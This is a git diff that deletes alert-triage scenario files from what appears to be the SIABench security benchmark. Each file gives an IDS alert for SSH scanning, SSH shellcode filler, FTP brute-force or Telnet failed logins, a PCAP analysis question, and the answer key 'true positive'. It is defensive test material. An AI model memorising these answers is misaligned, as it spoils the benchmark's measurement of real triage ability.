a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_00390.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_00390", - "alert_type": "True", - "alert_name": "dp_00390" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:03:59.302074+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "alert": "1970-01-02T06:03:59.302074+0000 \"ET SCAN Potential FTP Brute-Force attempt response\" {TCP} 192.168.1.90:21 -> 192.168.1.70:52078", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06342.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06342.json deleted file mode 100644 index 3e9d02a6da7cef719193ef2779e25fd3760528ba..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06342.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06342", - "alert_type": "True", - "alert_name": "dp_06342" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-05:07:59.206981 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:56366 -> 192.168.1.90:22", - "alert": "01/01-05:07:59.206981 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:56366 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06409.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06409.json deleted file mode 100644 index 96e1d75b89b8f4decfe53cc722c866d4d9266564..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06409.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06409", - "alert_type": "True", - "alert_name": "dp_06409" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:05:14.922057+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:54414 -> 192.168.1.90:22", - "alert": "1970-01-01T05:05:14.922057+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:54414 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06427.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06427.json deleted file mode 100644 index eaec2b29056d36dda6871ac960985e9a354a87e9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06427.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06427", - "alert_type": "True", - "alert_name": "dp_06427" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:07:55.827864+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56324 -> 192.168.1.90:22", - "alert": "1970-01-01T05:07:55.827864+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56324 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06549.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06549.json deleted file mode 100644 index 620c75b83a4d1b921c5f90377311fd2bd9dea73a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06549.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06549", - "alert_type": "True", - "alert_name": "dp_06549" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-06:37:38.618542 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:55958 -> 192.168.1.90:22", - "alert": "01/02-06:37:38.618542 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:55958 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06600.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06600.json deleted file mode 100644 index eb0e690cbb59c486d8bbeaa3fdd8cb11362d277b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06600.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06600", - "alert_type": "True", - "alert_name": "dp_06600" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-06:39:06.350911 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43416 -> 192.168.1.90:22", - "alert": "01/02-06:39:06.350911 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43416 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06629.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06629.json deleted file mode 100644 index ec568345263a9c2abcb267ea4c53af0b4ea71bf8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_06629.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_06629", - "alert_type": "True", - "alert_name": "dp_06629" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:36:24.809877+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:38924 -> 192.168.1.90:22", - "alert": "1970-01-02T06:36:24.809877+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:38924 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07250.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07250.json deleted file mode 100644 index ca8d87cb2129c09675808d22f92abdf02be9380a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07250.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07250", - "alert_type": "True", - "alert_name": "dp_07250" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-05:24:25.529313 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43356 -> 192.168.1.90:22", - "alert": "01/01-05:24:25.529313 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:43356 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07275.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07275.json deleted file mode 100644 index e67fcac49412ddac146e73d91952dfe0a3750bf6..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07275.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07275", - "alert_type": "True", - "alert_name": "dp_07275" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-05:25:19.286056 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:40442 -> 192.168.1.90:22", - "alert": "01/01-05:25:19.286056 \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" {TCP} 192.168.1.70:40442 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07311.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07311.json deleted file mode 100644 index 2a436cd3ddc39e4a031256c8d3a292a6267667ed..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07311.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07311", - "alert_type": "True", - "alert_name": "dp_07311" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:22:48.419132+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:37614 -> 192.168.1.90:22", - "alert": "1970-01-01T05:22:48.419132+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:37614 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07521.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07521.json deleted file mode 100644 index 5f823092c9b8fe7d8c7660eaffff13417b0c4470..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07521.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07521", - "alert_type": "True", - "alert_name": "dp_07521" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:28:00.377062+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:39634 -> 192.168.1.90:22", - "alert": "1970-01-01T05:28:00.377062+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:39634 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07529.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07529.json deleted file mode 100644 index f8f3459092eaa0ada922ce6600ce04f5ec0ab4b8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07529.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07529", - "alert_type": "True", - "alert_name": "dp_07529" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:29:06.254882+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56300 -> 192.168.1.90:22", - "alert": "1970-01-01T05:29:06.254882+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56300 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07542.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07542.json deleted file mode 100644 index 70ea8723e8cec5a2f9143ed78c527d9496322a59..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_07542.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07542", - "alert_type": "True", - "alert_name": "dp_07542" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:31:00.324959+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:35930 -> 192.168.1.90:22", - "alert": "1970-01-01T05:31:00.324959+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:35930 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08150.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08150.json deleted file mode 100644 index 5d4b23b14a6af489d6394b2a69bf1a8bdd80ac64..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08150.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_08150", - "alert_type": "True", - "alert_name": "dp_08150" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:18:00.365019+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:52638 -> 192.168.1.90:22", - "alert": "1970-01-02T06:18:00.365019+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:52638 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08164.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08164.json deleted file mode 100644 index 5a5d883a9c2a61893558775705a4351626d631db..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08164.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_08164", - "alert_type": "True", - "alert_name": "dp_08164" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:19:59.536435+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:42650 -> 192.168.1.90:22", - "alert": "1970-01-02T06:19:59.536435+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:42650 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08178.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08178.json deleted file mode 100644 index 3d2fda149da635ae7cdb2c762e48c993f9dba5a9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_08178.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_08178", - "alert_type": "True", - "alert_name": "dp_08178" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:22:02.970701+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:54624 -> 192.168.1.90:22", - "alert": "1970-01-02T06:22:02.970701+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:54624 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_11449.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_11449.json deleted file mode 100644 index 99bed505dfc3acc4f0a5ee1d0a349c3b51fb94fc..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_11449.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_11449", - "alert_type": "True", - "alert_name": "dp_11449" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-05:12:26.887431 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:48734", - "alert": "01/02-05:12:26.887431 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:48734", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_11996.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_11996.json deleted file mode 100644 index 8ac918ef738ead9291b8827195d37689107559cd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_11996.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_11996", - "alert_type": "True", - "alert_name": "dp_11996" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:12:54.338253+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49276", - "alert": "1970-01-02T05:12:54.338253+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49276", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_12054.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_12054.json deleted file mode 100644 index b4921305c2545ae281c6aadfd648d8ce5ff9c82e..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_12054.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_12054", - "alert_type": "True", - "alert_name": "dp_12054" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:14:34.056535+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:59628", - "alert": "1970-01-02T05:14:34.056535+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:59628", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_17537.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_17537.json deleted file mode 100644 index 